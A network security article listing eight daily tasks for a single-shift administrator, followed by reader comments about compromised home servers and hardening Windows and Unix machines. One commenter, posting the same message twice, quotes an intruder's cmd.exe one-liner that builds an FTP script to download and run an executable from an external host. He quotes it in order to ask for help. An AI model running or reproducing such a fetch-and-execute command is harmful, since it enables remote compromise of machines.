Security

Eight daily steps to a more secure network

While many companies have a 9-to-5 security staff, hackers don't punch a clock. However, your network can still remain secure in the 16 hours in-between -- you just need to focus activities to provide maximum coverage for the network. Get started with this list of eight daily tasks.

In today's connected world, hacking is a 24/7 business. Whether approaching it as a job or a hobby, hackers don't punch a clock.

While many companies don't have the budget for 24/7 security managers, that doesn't mean you should just give up on security. If your security staff, or your one security staff member, is on a 9-to-5 schedule, your network can still remain secure in the 16 hours in-between -- you just need to focus activities to provide maximum coverage for the network.

Develop a methodical, comprehensive task list that provides the most efficient means of securing your network. To jump-start your planning, here are eight simple tasks you should make sure to check off every day.

In the morning

After arriving at work, get some coffee, check your e-mail, and do the following:

  1. Verify the current connections: There's nothing like catching malicious behavior while it's occurring. Inspect all the connections going through your firewall -- both in and out. Look for anomalies and investigate them; this could include outbound FTP or inbound Telnet/SSH sessions. You're looking for things that aren't normal.
  2. Look at network traffic statistics: How much activity took place while you weren't there? What type of traffic was it, and what was the destination and source?
  3. Look at your antivirus logs: Did a virus hit your e-mail system last night? Are the antivirus signatures up to date?
  4. Read the security logs on your domain servers: Did the system lock out any accounts last night? Pay special attention to any accounts with administrator access. Verify that lockouts were human error -- and not part of a breach attempt.
  5. Check for new security patches: Determine whether any of your vendors released patches for any software in your baseline. (If you don't have a baseline, I highly recommend developing one.) If a new patch is available, read the release notes thoroughly. Then, make a decision or recommendation whether to implement it now or wait for scheduled system downtime.

In the afternoon

When you arrive back from lunch, there's still a lot left to do:

  1. Meet and brief: Managers like to know what's going on, so don't wait for them to ask -- tell them. Meet and brief on anything that occurred during the evening and the actions you've taken so far. This is also a good time to pitch new ideas, such as tools that could help you defend the network or staff training.
  2. Check more logs: Take an in-depth look at IDS and firewall logs. Who on the Internet is knocking on your door? What are they looking for? Who on the inside of your network is doing something they shouldn't be? If you find unauthorized and/or illegal activity, report it immediately, and take action to stop it.
  3. Turn knowledge into action: Now that you know what went on while you weren't there, develop an action plan to prevent the behavior in the future. Do you need to adjust your firewall rules? Is your IDS catching and reporting the proper events? Do you need to archive logs to save space on your servers? Do you need to give a final briefing on any actions that occurred during the last 24 hours?

Final thoughts

A lot of companies don't run 24/7 security operations, and sometimes you might find yourself as the only person providing security for a network. While it's easy to get caught up in events and miss important items on your security checklist, you'll never know what you're missing if you don't create a list in the first place. Network security shouldn't be reactionary -- don't wait for events to drive you into action.

The above list isn't complete, but it's a starting point. Create your own security to-do list that's specific to your organization's needs, and keep your security on track.

Mike Mullins has served as an assistant network administrator and a network security administrator for the U.S. Secret Service and the Defense Information Systems Agency. He is currently the director of operations for the Southern Theater Network Operations and Security Center.

Worried about security issues? Who isn't? Automatically sign up for our free Security Solutions newsletter, delivered each Friday, and get hands-on advice for locking down your systems.

17 comments
cd613
cd613

yet I add more but they are more for security

JCitizen
JCitizen

let alone the office! Thanks Mike!

jmixmaster
jmixmaster

I do under stand that anti-virus, windows updates--etc. occur during idle times, however, I seem to be getting activity from the isp TO my network on a regular basis--should I be concerned?? Mix

dlragsdale
dlragsdale

OK...I have been running a website, ftp server, etc from my home for about 1 year, with no problems. Just this week, my server was completely overtaken, and the sad thing is I caught them, just a little too late. They have completely corrupted my website, emptied all logs....and no telling what else. But what they don't know is that while they were trying to wrap things up, I got their IP address. The address looks like it came from my ISP. Is there anything that I can do to take legal action or find out who this person(s) are? PLEASE HELP... It is not a business site, but it is a family website with pictures, news, etc. I need to know what I can do. I also discovered how they got in and I have closed that port, but I don't know if they opened any other doors. I have completed virus scans, adware/spyware scans. I also have a command line that was still in the system that I'm not sure what it does...it looks like they were trying to remove their IP address from accessing the FTP site. THANKS IN ADVANCE FOR THE ADVICE

dlragsdale
dlragsdale

I have completed the 2003 installation and services...All seems good except for logging into my website....NO ONE can log in. I even looked at the asp.net configurations and users, they are all still there. Don't know what to do about that one...It is running from a SQL 2005 express DB...so if any gurus out there would like to help on that situation, I would be much appreciative.... But thanks again for the advice to do a clean sweep and reinstall 2003...It seems to run smoother on that machine as well.

DanLM
DanLM

Is it a windows or unix system? Do you have a router between you and the machine that was hacked? -- If you close off the ports at the router, then no matter what the machine thinks is open. Its not open to the world. I run a unix server at home, and I found I was being pounded on by people looking for ways to get in. I did the following to tighten down my machine. 1). Only opened my ports at the router for ssh, ftp, and the web page. 2). Put in a unix firewall. - did a lot of reading here, and found some good sugestions for generic blocks that stop spoofing and lynix box's that are scanning my machine. 3). Started reviewing my logs daily(ssh/ftp/web page). Looking for brute force attacks. When I found ip's that I didnt trust in my logs, instant firewalling to all services. --- I automated some of this through perl and shell scripts. Have these scripts running every 2 minutes to check the logs. Im looking to get this to be real time. If you tell me the os, I might be able to offer some other sugestions. And point you at some tutorials/forum postings/articles to further secure your machine. Dan

dlragsdale
dlragsdale

It is a Windows 2000 server...with a linksys router between it and the world. I had ftp, web, remote admin web, several gaming and a voice communications application port open. I have closed all of the gaming, voice, remote admin, and web ports..the only thing open now is ftp. Which I feel may have been compromised some way to allow an intruder in. This is the line I caught him typing in the run line: cmd.exe /c del i&echo open 207.68.xxx.xxx 32676 > i&echo user 1 1 >> i &echo get e_68.exe >> i &echo quit >> i &ftp -n -s:i &e_68.exe&del i&exit What does that do exactly? Is there anything that I can do legally since he has destroyed an electronic property :D?

safesax2002
safesax2002

I'll second that answer on 2003. Much more secure, plus IIS has been upgraded to version 6 from 5. Big difference in security.

ashine
ashine

Microsoft did a lot of work securing between releasing Windows 2000 and 2003. You'll find that 2003 doesn't automatically install some services eg IIS, so you'll have to add them yourself (usual thing: add/remove programs, select windows components, select he component you want and drop the cd in the drive etc). Micsorosft did this to reduce the attack surface of 2003: the less services running the less there is to attack. And do remmber to go to windows update and get the latest security patches (for preference setup the automatic windows update to do this on a schedule!) Good luck

dlragsdale
dlragsdale

I can put Windows Server 2003 instead of 2000....Does anyone have any input as to which one is more secure?

Krunkl3
Krunkl3

*dale... I am not a lawyer, and local laws vary in your availablerecourse. General security practices would say if the machine has been compromised it is no longer yours and will not be yours again w/o a format & re-install. No amount of rooting out of intruders is 100% effective, so if you value the services this machine provides, take it offline, archive/disk-image if desired (to find and close the holes), and re-install. I'll second sans.org as an excellent resource for hardening systems. The learning curve on hardening Windows 2k+ machines is steep but it can be done. Good luck. - Logan

dlragsdale
dlragsdale

It is a Windows 2000 server...with a linksys router between it and the world. I had ftp, web, remote admin web, several gaming and a voice communications application port open. I have closed all of the gaming, voice, remote admin, and web ports..the only thing open now is ftp. Which I feel may have been compromised some way to allow an intruder in. This is the line I caught him typing in the run line: cmd.exe /c del i&echo open 207.68.xxx.xxx 32676 > i&echo user 1 1 >> i &echo get e_68.exe >> i &echo quit >> i &ftp -n -s:i &e_68.exe&del i&exit What does that do exactly? Is there anything that I can do legally since he has destroyed an electronic property :D?

trl145
trl145

Mike Mullins' comments are good and I take them to heart. However, still being a novice, and realizing his page was not intended for novices, though perhaps others like me might agree, the question is HOW can I do what he advises? Literally, step by step, how can I . . . 1 check my traffic 2 see if my anti-virus software has been attacked and so on and so on thanks t

Mysterious
Mysterious

Had a prof at the Big U, who described the worst test he ever had: A. Define the Universe B. Give three examples Your question, while valid, is roughly equivalent to that test. You see, Mike's advice is necessarily generic, because there are so many different systems out there, from PCs to Macs to Solaris to Linux to VAXen to mainframes to...well, you get the idea. Not knowing what you're working on, it's tough to make suggestions. However, the easiest answer is to read your log files. In Windows, it's the Event Viewer. In most Linux/Unix boxes, it's usually something like /var/adm/messages. Learn to use the Windows filters, or to grep in L/Unix (or use something like LogWatch -- Google will help with that one). The next step is to go to sans.org, or any of a dozen other sites, and study up on what you should be looking for, because it's different for every different kind of box (and sometimes your firewall logs won't tell you what your web server logs will, so don't expect to catch everything in one place). Have fun with it, learn as much as you can, and let us know how it goes.

BIOSphereopts
BIOSphereopts

Just checked my logs in my AV firewall, and for the windows firewall, then checked event viewer to find two unsucsessful attempts to log in to my account! I then went to my windows firewall and found that ftp, telnet, remote desktop and http server were all enabled! Ive been tracing IPs to Austrailia and Sweden. What can I do, I shut down the ports they opened, it seems that the Trend-microcillin firewall is blocking alot of UDP attempts from ports in the 30k range, and 1026 and 1027. Scary stuff!

sean
sean

Sure, you might find something but even using filters you are bound to miss something. No sys admin has enough time to stay on top of such a herculean task not to mention the storage reqirements on a Windows server (no syslog built in) can be onerous. Your best bet is to get an IDS that will will proactively scan for suspicious behavior and use a tool that will scan the logs for you and alert you to based on predefined rules sets.

DanLM
DanLM

I really have no idea what to check on my Windows system. But, I read both the /var/log/auth and /var/log/pf.log on my unix system. The auth log tells me valid/invalid inputs via ssh. Oh, and my ftp logs. I found loads of information in them too. Brute force attempts. The pf log shows me, because of my settings. A pattern of who is being blocked based on my rule set. I'm going to install snort, which is a IDS(???). That analyzes all trafic to identify possible holes and attempts against my system that I have not previously blocked or accounted for. Dan

Editor's Picks